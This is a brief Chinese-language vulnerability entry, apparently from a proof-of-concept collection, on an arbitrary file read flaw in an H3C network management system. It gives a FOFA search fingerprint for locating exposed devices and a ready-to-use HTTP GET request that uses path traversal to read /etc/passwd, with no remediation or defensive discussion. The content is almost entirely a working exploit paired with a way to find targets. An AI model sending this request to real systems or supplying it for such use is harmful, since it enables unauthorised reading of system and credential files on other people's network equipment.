跳到主要内容

H3C网络管理系统任意文件读取漏洞

H3C网络管理系统任意文件读取漏洞

fofa

body="webui/js/jquerylib/jquery-1.7.2.min.js"

poc

GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1

image

image